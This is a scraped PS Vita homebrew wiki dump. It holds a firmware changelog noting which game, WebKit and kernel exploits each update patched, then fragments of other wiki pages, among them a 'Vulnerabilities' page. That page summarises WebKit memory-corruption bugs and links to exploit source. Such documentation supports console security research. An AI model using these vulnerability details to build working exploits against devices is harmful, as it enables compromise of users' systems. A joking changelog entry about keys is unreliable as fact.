* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
<hr><br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|align=center|'''3.70'''<br />January 14, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Changed the enc key<br />
*Forgot to change any other keys. Oops!<br />
|-<br />
|align=center|'''3.71'''<br />July 23, 2019<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
<hr><br />
*Fixed the Trinity exploit chain<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11235Main Page/Header2019-07-02T22:47:19Z<p>Xyz: </p>
<hr />
<div><br />
== Welcome To The One And Only Vita Development Wiki ==<br />
<br />
Chat with us on Discord: [https://discord.gg/m7QGqj5 HENkaku #wiki] (most active, stay around until someone answers!).<br />
<br />
Alternatively, you can chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or on IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/News&diff=11225Main Page/News2019-05-05T18:50:43Z<p>Xyz: </p>
<hr />
<div>{{Box-round|title=News|<br />
* '''2019-05-05''': Trinity is released<br />
* '''2018-12-29''': [https://media.ccc.de/v/35c3-9364-viva_la_vita_vida 35C3: Viva la Vita Vida]<br />
* '''2018-07-01''': h-encore is released<br />
* '''2017-07-29''': HENkaku Ensō is released<br />
* '''2016-07-29''': HENkaku is released<br />
}}</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Main_Page/Header&diff=11092Main Page/Header2019-02-24T18:08:59Z<p>Xyz: </p>
<hr />
<div><br />
== Welcome To Vita Development Wiki ==<br />
<br />
Chat with us on Matrix: [https://riot.im/app/#/room/#henkaku:matrix.org #henkaku:matrix.org] (guest access enabled) or IRC: [irc://chat.freenode.net/henkaku #henkaku] @ freenode (deprecated and not recommended).</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=10704Vulnerabilities2019-02-09T01:40:07Z<p>Xyz: /* WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) */</p>
<hr />
<div>== Userland ==<br />
<br />
=== Webkit exploits in Email app ===<br />
<br />
Implemented by xyz, in order HENkaku to be launched offline.<br />
See [https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup]<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
[https://bitbucket.org/DaveeFTW/psvita-260-webkit/src/master/ exploit code by Davee]<br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.30-3.36) (CVE-2014-1303) ===<br />
<br />
The CSSSelectorList can be mutated after it's allocated. If the mutated list contains less entries than the original one, a restrictive 1-bit OOB write can be achieved.<br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not.PDF</ref><br />
<ref>https://www.blackhat.com/docs/eu-14/materials/eu-14-Chen-WebKit-Everywhere-Secure-Or-Not-WP.pdf</ref><br />
<ref>https://cansecwest.com/slides/2015/Liang_CanSecWest2015.pdf</ref><br />
<br />
=== WebKit 537.73 (as used in Vita FW 3.50-3.60) (unknown or no CVE) ===<br />
<br />
Discovered by an anonymous. Fixed in 3.61 (see [https://blog.xyz.is/2016/webkit-360.html#bonus-how-sony-patched-it how it was patched]).<br />
<br />
The JSArray::sort method has a heap use-after-free vulnerability. If an array containing an object with a custom toString method is sorted, and the toString method causes the array to be reallocated, then the sorted elements will be written to the old freed address.<br />
<br />
[https://blog.xyz.is/2016/webkit-360.html xyz's writeup about 3.60 webkit exploit]<br />
<br />
[https://blog.xyz.is/2016/henkaku-offline-installer.html xyz's writeup about ROP in webbrowser]<br />
<br />
[https://github.com/henkaku/henkaku/blob/master/webkit/exploit.js 3.60 webkit exploit source code by xyz]<br />
<br />
[https://gist.github.com/St4rk/f1375a22dad6e5bbcff8067fdf26600f 3.60 webkit exploit simplified code by St4rk]<br />
<br />
=== PSM Mono privilege escalation ===<br />
<br />
